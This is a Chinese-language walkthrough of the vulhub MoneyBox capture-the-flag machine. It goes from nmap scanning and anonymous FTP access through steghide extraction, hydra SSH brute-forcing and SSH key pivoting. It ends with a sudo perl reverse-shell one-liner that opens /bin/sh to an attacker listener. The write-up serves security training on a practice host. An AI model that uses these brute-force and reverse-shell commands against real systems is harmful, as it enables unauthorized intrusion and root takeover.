靶機介紹
(1)靶機名稱:1-Free-MoneyBox
(2)難度級別:低
(3)靶機來源:vulhub
(4)課程來源:https://www.aqniukt.com/goods/show/2434?targetId=16289&preview=0
打靶程序
(1)啟動靶機后,無法通過用戶名和密碼直接登入至靶機
(2)默認情況并不知道靶機的IP地址,因靶機采用僅主機方式與物理機連接,查看到物理機僅主機網卡名稱為VirtualBox Host-Only Network

(3)查找靶機地址
法一:使用命令arp-scan掃描網卡vboxnet0所在網段的所有的IP地址(適用于Linux作業系統)
#sudo arp-scan -I vboxnet0 -l

法二:通過nmap -sP掃描192.168.56.0/24斷存活主機

(4)使用nmap掃描改IP開放的所有埠
#sudo nmap -p- 192.168.56.102

通過掃描發現,該靶機開放三個埠,21、22、80
(5)對每一個埠進行作業服務的指紋掃描(應用服務版本資訊等)
#sudo nmap -p21,22,80 -sV 192.168.56.102

掃描發現21埠運行vsftpd,22埠運行OpenSSH7.9p1版本,且目標服務器作業系統為Debian,80埠運行Apache httpd2.4.38
(6)對每一個埠進行腳本掃描
①對21埠進行腳本掃描(即呼叫nmap針對ftp服務的默認掃描的腳本)
#sudo nmap -p21 -sC 192.168.56.102

通過掃描發現,該靶機21埠ftp服務存在一個匿名登錄的漏洞(即不需要輸入賬號密碼或者只需要輸入Anonymous用戶即可登陸至ftp服務器)
②對22埠ssh服務進行腳本掃描(即呼叫namp針對ssh服務的默認掃描的腳本)
#sudo nmap -p22 -sC 192.168.56.102

該掃描結果,并未發現ssh服務在配置和應用上的漏洞,只是發現了加密的key
③對80埠httpd服務進行腳本掃描(即呼叫namp針對httpd服務的默認掃描的腳本)
#sudo nmap -p80 -sC 192.168.56.102

該掃描結果,并未發現httpd服務在配置和應用上的漏洞,只是發現了http的title資訊為MoneyBox
總結:通過對三個埠掃描發現,只有ftp服務的漏洞型別是最明顯的,所以先用ftp命令登陸至目標服務器
7)通過匿名用戶登錄目標服務器(用戶名和密碼都輸入anonymous)
#ftp 192.168.56.102

8)查看當前ftp服務器都有哪些檔案
ftp>ls

通過ls發現一張名字為trytofind.jpg的檔案,似乎是在提示我們去找寫什么東西
9)將圖片下載下來
ftp>get trytofind.jpg

10)最后,可以測驗,是否可以通過ftp直接跳轉到作業系統的其他路徑
ftp>cd /
ftp>pwd

通過測驗發現,仍然在當前路徑,無法直接跳轉到作業系統其他路徑
11)退出ftp
ftp>exit

12)通過圖片查看工具gwenview打開圖片(打開圖片需要仔細觀察這張圖片有沒有什么可用的資訊)
#gwenview trytofind.jpg

通過圖片未觀察到什么有用的資訊
12)一般滲透攻擊的初期是慎用暴力破解密碼攻擊的,因為密碼破解程序中,會大量向服務器發送資料包,容易引起服務器端的警覺,引起系統管理員的懷疑
13)通過開發的80埠,訪問web頁面是否有有用的資訊
瀏覽器:http://192.168.56.102/

該界面看不到什么有用的資訊,同時查看頁面源代碼也沒有發現什么有用的資訊
14)通過目錄掃描工具dirsearch -u 對靶機站點進行掃描
#dirsearch -u http://192.168.56.102


通過掃描發現一個http://192.168.56.102/blogs/站點,對其進行訪問
15)訪問上一步發現的站點http://192.168.56.102/blogs/


查看頁面未發現任何有價值的東西,查看源代碼,在最下面48行發現提示:the hint is the another secret directory is S3cr3t-T3xt(這個提示是另外一個秘密的目錄S3cr3t-T3xt)
16)訪問這個目錄
http://192.168.56.102/S3cr3t-T3xt/


查看源代碼,發現一個密鑰:Secret Key 3xtr4ctd4t4,該密鑰是做什么用的現在還不得而知
總結:做完以上操作,似乎攻擊滲透進入了瓶頸期,此時可以嘗試一下ssh的暴力破解
17)先使用nmap針對ssh暴力破解的腳本ssh-brute,掛載一個用戶名字典,掛載一個密碼字典
#nmap --script ssh-brute --script-args userdb=user.txt,passdb=rockyou.txt 192.168.56.102

未能暴力破解出root密碼
18)在Kali上使用工具對下載下來的圖片進行資訊搜集
①先使用strings命令查看圖片上面是否有可列印的字符,也許字符中會泄露一些機密資訊
#strings trytofind.jpg
查看圖片頭部發現一些并不應該出現的字符,此時不得不懷疑,該圖片有可能使用隱寫術的方式隱藏著某些機密的內容

②使用隱寫術解密工具steghide訪問該圖片
#steghide info trytofind.jpg

? 輸入命令時,提示是否嘗試獲取圖片中確定的資料,選擇yes,此時需要輸入密碼才能解出嵌入到圖片中的資料,此時可以通過使用web頁面中給出的密鑰(碰碰運氣),發現了圖片中嵌入的資料為“data.txt”
③使用隱寫術解密工具steghide榨取資訊的引數extract,提取嵌入到圖片中的檔案“data.txt“
steghide extract -sf trytofind.jpg

18)查看從圖片中榨取出的資料”data.txt“
#cat data.txt

從檔案內容可知目標系統存在一個nenu的用戶,且該用戶密碼很弱
19)此時通過密碼破解工具hydry對renu用戶進行破解
#echo renu >user.txt
#hydra -l renu -P rockyou.txt 192.168.56.102 ssh

通過hydra破解出renu用戶密碼為987654321
20)嘗試使用renu用戶及密碼通過ssh服務登錄目標服務器
#ssh [email protected]
#id

21)登錄成功后,查看nenu用戶是否有sudo權限
$sudo -s #輸入的密碼為sudo密碼,即renu密碼
$uname -a

通過sudo -s發現renu用戶不在sudoers 檔案中
22)查看歷史命令,是否有可用資訊
$history

通過歷史命令發現,目標主機還有一個lily用戶,并且renu對lily用戶做了免密登錄(即renu用戶不需要密碼直接登陸至lily用戶)
23)查看renu用戶公鑰檔案
$cd ./ssh
$ls
$cat id_rsa.pub

24)嘗試進入lily用戶的家目錄
$cd /home/lily
$ls
$cat /user2.txt
$cd /home/lily/.ssh
#ls
#cat authorized_keys

直接獲取到了lily用戶的flag檔案,同時在lily用戶的.ssh目錄下發現了renu用戶的公鑰
25)通過ssh,查看是否可直接通過renu用戶免密登錄至lily用戶
$ssh [email protected]
$id

26)查看lily用戶是否具有sodu權限
$sudo -s

此時需要輸入lily用戶的密碼,我們不知道lily用戶密碼,所以無法直接通過sudo提升至root
27)通過查看lily用戶的history命令,查看是否有可用資訊
$history
查看到lily用戶輸入過sudo -l命令,該命令主要是列出sudo權限命令

28)通過sudo -l查看到了lily用戶的sudo權限
$sudo -l

查看到perl命令可不需要root用戶也可以執行該命令
29)通過perl命令進行反彈shell,獲取到root權限
lily@MoneyBox:~$ sudo perl -e 'use Socket;$i="192.168.56.103";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
(root??kali) #nc -lvvp 2333


30)通過反彈的shell視窗查看root用戶及renu用戶flag
#id
#ls
#cat user2.txt
#cd /home/renu
#ls
#cat user1.txt

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/538028.html
標籤:其他
下一篇:O-MVLL代碼混淆方式
